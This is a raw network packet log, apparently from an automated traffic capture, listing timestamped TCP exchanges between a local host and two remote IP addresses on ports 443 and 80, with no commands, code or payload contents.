Aug 19, 2024 06:06:12.713907003 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.713949919 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.713968992 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.713977098 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.714020014 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.733350039 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.733392000 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.733414888 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.733434916 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.733448982 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.733525991 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.748008966 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.748054981 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.748080015 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.748090982 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.748137951 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.748138905 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.757488966 CEST	80	49879	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:12.757559061 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.765300035 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.765345097 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.765377998 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.765388966 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.765428066 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.765428066 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.782502890 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.782547951 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.782594919 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.782608986 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.782633066 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.782666922 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.796209097 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.796253920 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.796344995 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.796344995 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.796360016 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.796446085 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.810576916 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.810620070 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.810643911 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.810661077 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.810704947 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.810780048 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.822942972 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.822984934 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.823019028 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.823029041 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.823050022 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.823216915 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.832220078 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.832264900 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.832288027 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.832305908 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.832330942 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.832349062 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.842134953 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.842183113 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.842223883 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.842233896 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.842267990 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.842319012 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.849631071 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.849673986 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.849715948 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.849731922 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.849740028 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.849814892 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.858067989 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.858114004 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.858133078 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.858139992 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.858175993 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.858211994 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.867067099 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.867113113 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.867145061 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.867151976 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.867176056 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.867265940 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.870587111 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.870949984 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.875654936 CEST	80	49879	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:12.875709057 CEST	49879	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.875747919 CEST	80	49880	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:12.875811100 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.876069069 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:12.880331993 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.880378008 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.880394936 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.880409956 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.880454063 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.880454063 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.880826950 CEST	80	49880	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:12.899323940 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.899372101 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.899416924 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.899426937 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.899466038 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.899466038 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.911984921 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.912025928 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.912066936 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.912066936 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.912085056 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.912100077 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.912152052 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.920999050 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.921042919 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.921072960 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.921086073 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.921127081 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.921127081 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.930901051 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.930947065 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.931001902 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.931009054 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.931027889 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.931051970 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.938585043 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.938642025 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.938657999 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.938667059 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.938707113 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.938707113 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.947563887 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.947603941 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.947644949 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.947652102 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.947676897 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.947736025 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.955775976 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.955821991 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.955857992 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.955867052 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.955900908 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.955952883 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.974628925 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.974672079 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.974721909 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.974731922 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.974780083 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.974780083 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.988373995 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.988415003 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.988459110 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.988468885 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:12.988495111 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:12.988521099 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.000816107 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.000858068 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.000914097 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.000921965 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.000940084 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.000988960 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.009995937 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.010040998 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.010065079 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.010077000 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.010099888 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.010160923 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.019848108 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.019905090 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.019921064 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.019928932 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.019970894 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.019970894 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.027518988 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.027592897 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.027606964 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.027673960 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.035877943 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.035922050 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.035950899 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.035965919 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.035996914 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.036015034 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.044941902 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.044986010 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.045021057 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.045031071 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.045047998 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.045078993 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.070277929 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.070328951 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.070404053 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.070404053 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.070414066 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.070444107 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.077075005 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.077117920 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.077146053 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.077162027 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.077189922 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.077250004 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.089555979 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.089601040 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.089695930 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.089695930 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.089704037 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.089751959 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.089881897 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.089888096 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.092555046 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.092677116 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.092677116 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.092699051 CEST	443	49878	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.096752882 CEST	49878	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.344500065 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.344531059 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.348458052 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.348745108 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:13.348767996 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:13.645611048 CEST	80	49880	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:13.645744085 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.648842096 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.649230957 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.654043913 CEST	80	49880	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:13.654057026 CEST	80	49882	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:13.654144049 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.654150009 CEST	49880	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.654280901 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:13.659001112 CEST	80	49882	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:14.013895988 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.014024973 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.014725924 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.014730930 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.016261101 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.016273975 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.437005997 CEST	80	49882	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:14.437086105 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.443973064 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.444029093 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.444072962 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.444096088 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.444096088 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.444112062 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.444123030 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.444133997 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.444150925 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.444166899 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.474612951 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.474656105 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.474720001 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.474729061 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.474761009 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.474761009 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.541738987 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.541786909 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.541848898 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.541857958 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.541877031 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.541934967 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.572422981 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.572469950 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.572504044 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.572513103 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.572540045 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.572563887 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.611217022 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.611263037 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.611299038 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.611306906 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.611345053 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.611345053 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.636158943 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.636203051 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.636250973 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.636259079 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.636301994 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.636301994 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.656619072 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.656666994 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.656716108 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.656716108 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.656724930 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.656779051 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.671844959 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.671889067 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.671930075 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.671942949 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.671973944 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.671973944 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.690258026 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.690308094 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.690361023 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.690371990 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.690380096 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.690412045 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.708194017 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.708237886 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.708322048 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.708322048 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.708332062 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.708406925 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.722462893 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.722506046 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.722539902 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.722557068 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.722585917 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.722609997 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.738051891 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.738078117 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.738203049 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.738225937 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.738279104 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.750310898 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.750329971 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.750413895 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.750425100 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.750474930 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.759378910 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.759394884 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.759486914 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.759515047 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.759573936 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.769311905 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.769330025 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.769387007 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.769402027 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.769479990 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.777086973 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.777102947 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.777189970 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.777189970 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.777199984 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.777240038 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.785712957 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.785728931 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.785809040 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.785809040 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.785820007 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.785886049 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.793957949 CEST	443	49881	195.201.118.191	192.168.2.4
